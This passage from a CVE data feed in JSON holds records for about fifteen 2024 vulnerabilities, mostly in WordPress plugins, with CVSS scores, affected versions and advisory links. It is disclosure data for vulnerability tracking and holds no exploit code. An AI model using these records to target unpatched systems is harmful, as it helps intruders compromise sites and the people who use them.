"ID" : "CVE-2024-10309", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/9eb21250-34bd-4600-a0a5-7c5117f69f04/", "name" : "https://wpscan.com/vulnerability/9eb21250-34bd-4600-a0a5-7c5117f69f04/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/9eb21250-34bd-4600-a0a5-7c5117f69f04/", "name" : "https://wpscan.com/vulnerability/9eb21250-34bd-4600-a0a5-7c5117f69f04/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Tracking Code Manager WordPress plugin before 2.4.0 does not sanitise and escape some of its metabox settings when outputing them in the page, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:data443:tracking_code_manager:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.4.0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2025-01-30T06:15Z", "lastModifiedDate" : "2025-05-11T23:38Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1031", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://docs.qq.com/doc/DYmhqV3piekZ5dlZi", "name" : "https://docs.qq.com/doc/DYmhqV3piekZ5dlZi", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.252304", "name" : "https://vuldb.com/?ctiid.252304", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252304", "name" : "https://vuldb.com/?id.252304", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://docs.qq.com/doc/DYmhqV3piekZ5dlZi", "name" : "https://docs.qq.com/doc/DYmhqV3piekZ5dlZi", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252304", "name" : "https://vuldb.com/?id.252304", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252304", "name" : "https://vuldb.com/?ctiid.252304", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in CodeAstro Expense Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file templates/5-Add-Expenses.php of the component Add Expenses Page. The manipulation of the argument item leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252304." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:oretnom23:expense_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-30T13:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10310", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/144d755a-e61a-4ecd-9d9a-9c6e3a1e6ea2?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/144d755a-e61a-4ecd-9d9a-9c6e3a1e6ea2?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3176764/bdthemes-element-pack-lite/trunk/modules/custom-gallery/widgets/custom-gallery.php", "name" : "https://plugins.trac.wordpress.org/changeset/3176764/bdthemes-element-pack-lite/trunk/modules/custom-gallery/widgets/custom-gallery.php", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom Gallery Widget 'image_title' parameter in all versions up to, and including, 5.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:bdthemes:element_pack:*:*:*:*:lite:wordpress:*:*", "versionEndExcluding" : "5.10.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-02T02:15Z", "lastModifiedDate" : "2024-11-04T13:06Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10311", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-288" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/external-database-based-actions/trunk/lib/edba-admin-ajax-controller.php?rev=1785239#L8", "name" : "https://plugins.trac.wordpress.org/browser/external-database-based-actions/trunk/lib/edba-admin-ajax-controller.php?rev=1785239#L8", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d41a8c39-8b06-45b2-afe4-8c695faf8cb8?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d41a8c39-8b06-45b2-afe4-8c695faf8cb8?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The External Database Based Actions plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 0.1. This is due to a missing capability check in the 'edba_admin_handle' function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to update the plugin settings and log in as any existing user on the site, such as an administrator." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cmorillas1:external_database_based_actions:0.1:*:*:*:*:wordpress:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-11-15T10:15Z", "lastModifiedDate" : "2024-11-19T17:03Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10312", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/dc931943-13f3-4ab1-b70f-c234253ca269?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/dc931943-13f3-4ab1-b70f-c234253ca269?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3175285/exclusive-addons-for-elementor", "name" : "https://plugins.trac.wordpress.org/changeset/3175285/exclusive-addons-for-elementor", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.7.4 via the render function in elements/tabs/tabs.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:exclusiveaddons:exclusive_addons_for_elementor:*:*:*:*:free:wordpress:*:*", "versionEndExcluding" : "2.7.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-10-29T08:15Z", "lastModifiedDate" : "2025-01-24T16:38Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10313", "ASSIGNER" : "ics-cert@hq.dhs.gov" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-298-02", "name" : "https://www.cisa.gov/news-events/ics-advisories/icsa-24-298-02", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "iniNet Solutions SpiderControl SCADA PC HMI Editor has a path traversal \nvulnerability. When the software loads a malicious ‘ems' project \ntemplate file constructed by an attacker, it can write files to \narbitrary directories. This can lead to overwriting system files, \ncausing system paralysis, or writing to startup items, resulting in \nremote control." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-24T18:15Z", "lastModifiedDate" : "2024-10-25T12:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10314", "ASSIGNER" : "security@perforce.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://portal.perforce.com/s/detail/a91PA000001SZNFYA4", "name" : "https://portal.perforce.com/s/detail/a91PA000001SZNFYA4", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In Helix Core versions prior to 2024.2, an unauthenticated remote Denial of Service (DoS) via the auto-generation function was identified. Reported by Karol Wiesek." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-11T14:15Z", "lastModifiedDate" : "2024-11-21T08:48Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10315", "ASSIGNER" : "security@perforce.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://portal.perforce.com/s/detail/a91PA000001SZVJYA4", "name" : "https://portal.perforce.com/s/detail/a91PA000001SZVJYA4", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "In Gliffy Online an insecure configuration was discovered in versions before 4.14.0-6. Reported by Alpha Inferno PVT LTD." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-11T20:15Z", "lastModifiedDate" : "2024-11-18T22:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10316", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-200" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3189021", "name" : "https://plugins.trac.wordpress.org/changeset/3189021", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a1cf60b-47bd-4e67-8fe4-6cf46809f2b2?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0a1cf60b-47bd-4e67-8fe4-6cf46809f2b2?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Stratum – Elementor Widgets plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.4 in includes/templates/content-switcher.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-11-21T11:15Z", "lastModifiedDate" : "2024-11-21T13:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10318", "ASSIGNER" : "f5sirt@f5.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-384" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://my.f5.com/manage/s/article/K000148232", "name" : "https://my.f5.com/manage/s/article/K000148232", "refsource" : "", "tags" : [ "Mitigation", "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A session fixation issue was discovered in the NGINX OpenID Connect reference implementation, where a nonce was not checked at login time. This flaw allows an attacker to fix a victim's session to an attacker-controlled account. As a result, although the attacker cannot log in as the victim, they can force the session to associate it with the attacker-controlled account, leading to potential misuse of the victim's session." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:f5:nginx_ingress_controller:*:*:*:*:*:*:*:*", "versionStartIncluding" : "3.0.0", "versionEndExcluding" : "3.7.1", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:f5:nginx_instance_manager:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2.5.0", "versionEndExcluding" : "2.17.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:f5:nginx_api_connectivity_manager:*:*:*:*:*:*:*:*", "versionStartIncluding" : "1.3.0", "versionEndExcluding" : "1.9.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:f5:nginx_ingress_controller:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2.2.1", "versionEndIncluding" : "2.4.2", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:f5:nginx_ingress_controller:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.12.5", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:f5:nginx_openid_connect:*:*:*:*:*:nginx_plus:*:*", "versionEndExcluding" : "2024-10-24", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.5 } }, "publishedDate" : "2024-11-06T17:15Z", "lastModifiedDate" : "2024-11-08T19:51Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10319", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/382a46c2-9fec-4642-93b0-c06b9ed1c086?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/382a46c2-9fec-4642-93b0-c06b9ed1c086?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3179221/xpro-elementor-addons", "name" : "https://plugins.trac.wordpress.org/changeset/3179221/xpro-elementor-addons", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The 140+ Widgets | Xpro Addons For Elementor – FREE plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.6 via the render function in widgets/content-toggle/layout/frontend.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpxpro:xpro_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.4.6.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-11-05T11:15Z", "lastModifiedDate" : "2024-11-08T15:25Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1032", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/6ISYe2urjlkI", "name" : "https://note.zhaoj.in/share/6ISYe2urjlkI", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.252307", "name" : "https://vuldb.com/?ctiid.252307", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252307", "name" : "https://vuldb.com/?id.252307", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://note.zhaoj.in/share/6ISYe2urjlkI", "name" : "https://note.zhaoj.in/share/6ISYe2urjlkI", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?id.252307", "name" : "https://vuldb.com/?id.252307", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.252307", "name" : "https://vuldb.com/?ctiid.252307", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in openBI up to 1.0.8. Affected by this vulnerability is the function testConnection of the file /application/index/controller/Databasesource.php of the component Test Connection Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252307." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:openbi_project:openbi:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0.8", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-30T14:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10320", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/cookielay/#developers", "name" : "https://wordpress.org/plugins/cookielay/#developers", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8e014aa5-4fdf-458b-a975-e3ced7186dc2?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8e014aa5-4fdf-458b-a975-e3ced7186dc2?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Cookielay plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cookielay shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-12-06T09:15Z", "lastModifiedDate" : "2024-12-06T09:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10321", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-200" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/widgetkit-for-elementor/trunk/elements/advanced-tab/template/view.php#L68", "name" : "https://plugins.trac.wordpress.org/browser/widgetkit-for-elementor/trunk/elements/advanced-tab/template/view.php#L68", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2e470017-c453-435d-8342-66874a794537?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/2e470017-c453-435d-8342-66874a794537?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The All-in-One Addons for Elementor – WidgetKit plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.4 in elements/advanced-tab/template/view.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:themesgrove:all-in-one_addons_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.5.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2025-03-08T09:15Z", "lastModifiedDate" : "2025-03-13T13:07Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10322", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3231744/", "name" : "https://plugins.trac.wordpress.org/changeset/3231744/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3231744/brizy/trunk/admin/svg/main.php", "name" : "https://plugins.trac.wordpress.org/changeset/3231744/brizy/trunk/admin/svg/main.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://wordpress.org/plugins/brizy/#developers", "name" : "https://wordpress.org/plugins/brizy/#developers", "refsource" : "", "tags" : [ "Product", "Release Notes" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3b2ef7c3-4610-4e8b-ab27-2d6cbdbed097?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3b2ef7c3-4610-4e8b-ab27-2d6cbdbed097?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Brizy – Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 2.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:brizy:brizy:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.6.9", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2025-02-12T13:15Z", "lastModifiedDate" : "2025-02-20T20:40Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10323", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e4b4e4ba-ab66-496a-b77f-8dd77cd16ea8?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e4b4e4ba-ab66-496a-b77f-8dd77cd16ea8?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : 